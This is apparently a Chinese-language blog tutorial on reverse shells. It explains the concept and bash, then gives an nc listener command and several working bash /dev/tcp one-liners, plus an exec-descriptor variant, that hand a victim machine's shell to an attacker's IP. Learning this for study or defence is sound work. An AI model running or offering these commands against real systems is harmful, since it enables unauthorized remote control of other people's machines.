反弹shell之最终篇实战远操
反弹shell讲解
今天进⾏实战远程操控
⼀.条件:
1我们可以对被攻击者的电脑进⾏命令执⾏
2被攻击者电脑上0,1,2各项权限不曾更改,或者更改你知道后续情况
⼆.如果想要测试需要准备的相关材料
三.思路指导
1.我们需要了解反弹shell的基本内容:
reverse shell,就是控制端监听在某TCP/UDP端⼝,被控端发起请求到该端⼝,并将其命令⾏的输⼊输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是⽹络概念的客户端与服务端的⾓⾊反转。
⼊何实现这个呢:
.我们需要在攻击者机器上先执⾏监听端⼝动向,从⽽第⼀时间获取信息
.我们需要在被攻击者的机器上执⾏重定向权限设置,将读写的权限转交到攻击者的电脑上
.我们需要⼀个多命令权限转交的中转,这就需要引⽤linux 再带的shell中的权限了
2.linux shell的主要内容:
Shell本⾝是⼀个⽤C语⾔编写的程序,它是⽤户使⽤Unix/Linux的桥梁,⽤户的⼤部分⼯作都是通过Shell完成的。Shell既是⼀种命令语⾔,⼜是⼀种程序设计语⾔。作为命令语⾔,它交互式地解释和执⾏⽤户输⼊的命令;作为程序设计语⾔,它定义了各种变量和参数,并提供了许多在⾼级语⾔中才具有的控制结构,包括循环和分⽀。
Unix/Linux上常见的Shell脚本解释器有bash、sh、csh、ksh等,习惯上把它们称作⼀种Shell。
这次我们主要使⽤bash shell
我们先主要了解这个shell:
linux⾥⾯的⾃带shell,bash是 Bourne Again Shell 的缩写,是linux标准的默认shell ,它基于Bourne shell,吸收了C shell和Korn shell的⼀些特性。bash完全兼容sh,也就是说,⽤sh写的脚本可以不加修改的在bash中执⾏。因为是默认的shell,所以基本上百分之九⼗的linux系统都存在,也是我们这次演练的原因
当然如果你想了解更多
四. 实战演练
⾸先我们在攻击者系统上执⾏可以进⾏监控端⼝的指令,主要是nc命令的显现:
⾸先我们先来准备⼀下命令:
nc -lvp 2233
会出现下⾯的样式
然后我们在被攻击的系统上执⾏我们(如果看不到下⾯的命令请务必查看我上⾯指向的博客了解)
bash -i>& /dev/tcp/192.168.123.107/2233 0>&1
我们来看⼀下效果
好像没有什么变化,但是我们在看我们攻击者的电脑上的变化,我顺便执⾏了⼀条ip查询指令:
然⽽查询出的ip确是
然后我们尝试在被攻击的电脑上执⾏命令
然⽽
然⽽我们发现,⽆论是什么指令都没有什么显⽰,为什么呢,这就归功于我们之前的nc命令的功劳,如果到这你都好没有看我之前的博客,我就只能滑稽护体了
我们在攻击者的电脑上执⾏下之前命令
发现之前的命令都有显⽰,太真实了,因为我们把0,1,2都重定向到了攻击者的电脑上了啦…
五.其他的shell语句:
1bash -i>& /dev/tcp/192.168.146.129/2333 0<&1
2bash -i >& /dev/tcp/192.168.146.129/2333 <&2
与2等价bash -i >& /dev/tcp/192.168.146.129/2333 0<&2linux循环执行命令脚本
3exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5
六.总结
到此总结反弹shell就结束了,毕竟这是我⼀个⼈学习的经验,我希望如果我有错误⼤家可以及时评论指出,我好及时更正,谢谢

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。